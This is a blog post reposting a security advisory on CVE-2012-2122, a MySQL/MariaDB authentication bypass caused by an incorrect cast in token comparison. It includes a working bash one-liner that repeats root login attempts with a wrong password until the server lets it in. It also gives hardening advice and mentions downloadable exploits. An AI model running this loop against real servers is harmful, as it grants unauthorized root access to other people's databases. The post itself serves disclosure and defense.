Kip – Knowledge Is Power

Technology Rules, Knowledge Is Power, Power to the People,

Sidebar

Dedicated Rooms

  • BitCoin Info
  • Library of Code
  • Useful online tools
  • About Site & Stats
    • Program Stats

Categories

  • Bitcoins (4)
  • Computers (168)
    • Anti-* (1)
    • Anti-Virus (1)
    • Command Line (32)
    • Computer Networking (45)
      • Authentication (2)
      • IPs and Ranges (2)
      • Network Cracking Tools (4)
      • Proxys (2)
      • Sniffing (1)
      • Sockets (1)
      • SSH (13)
      • TOR Onion Routing Network (2)
      • VPN's (2)
        • OpenVPN (1)
        • Zerotier (1)
    • File Systems (3)
      • Cluster file systems (2)
    • Malware (3)
      • MetaSploit (1)
    • OS's – Operating Systems (94)
      • Google's OS's (22)
        • Android (18)
          • Cracking (8)
          • Hacking (4)
          • Robotics (1)
          • Rooting (2)
      • Linux (54)
        • E-Mail (1)
        • Raspberry Pi (7)
        • Screen Savers (1)
      • Microsoft Windows (21)
        • Windows 10 (1)
      • Other Operating Systems (1)
    • Programming (39)
      • BASH (21)
      • Cold Fusion (1)
      • HTML / JavaScript (3)
      • Joomla (1)
      • MS SQL (1)
      • MySQL (6)
      • nginx (1)
      • Node.JS (1)
      • PHP (7)
      • PowerShell (3)
      • Robots (1)
      • SQLite (1)
    • Security (18)
    • Software (17)
      • Virtualization Systems (1)
        • Proxmox (1)
      • WebServers (1)
    • Tips & Tricks (30)
      • Search Engine Foo (1)
  • Cryptography or Cryptology (1)
  • Into the Future (5)
  • Local Area – Holmes County Ohio USA (1)
  • Movies (6)
  • News (69)
    • of BitCoin (1)
    • of Conspiracies (2)
    • of Edward Snowden (13)
    • of Game Plays (2)
    • of Technology and Science (15)
    • of the Weird (4)
    • The Cases of … (1)
      • Mcdonalds (1)
    • The Police State of… (32)
      • Australia (1)
      • United States of America (29)
  • Out of the Past (11)
  • Reviews (5)
    • of Books (1)
    • of Games (1)
    • of Products (2)
    • of Websites (1)
  • Robot_Droids_and_AI – Oh My! (3)
    • Software (1)
  • Stories (42)
  • Things passed in emails (3)
  • Uncategorized (1,871)
  • Videos (7)
    • Blimps OR Air Ships (1)
    • Funnies (1)
    • of Computers (5)
  • WebSites (3)
    • DropBox (1)
    • GRC (2)

Kernels of Insightful Comments, κριτικός & Wisdom

  • Anonymous on Zerotier VPN bridge BASH script

Meta

  • Log in
  • Entries RSS
  • Comments RSS
  • WordPress.org

Easiest Thing

CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability

Standard

From:


A serious security bug in MariaDB and MySQL Disclosed, According to Advisory All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122.

“When a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it might’vehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256.”

“Which means, if one knows a user name to connect (and “root” almostalways exists), she can connect using *any* password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent.Any client will do, there’s no need for a special libmysqlclient library.”

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

1
2
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
 

mysql>

Defense: The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.

the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the “bind-address” parameter to “127.0.0.1”. Restart the MySQL service to apply this setting.

Note: Download The Latest Exploits for CVE-2012-2122 From our TOOLS YARD section.

470 total views, 2 views today

  • Date 2012/06/11
  • Tags Access Control, Access Controls, Account Password, Crayon, Easiest Thing, Linux Distributions, Local System, Memcmp, Mysql Authentication, Mysql Daemon, Mysql Server, Random Strings, Remote Access, Root Password, Root User, Security Bug, Seq, Serious Security, Vulnerability, Zero Value
  • Comments Leave a comment
Proudly powered by WordPress
Theme: Writr by WordPress.com.
HTML Snippets Powered By : XYZScripts.com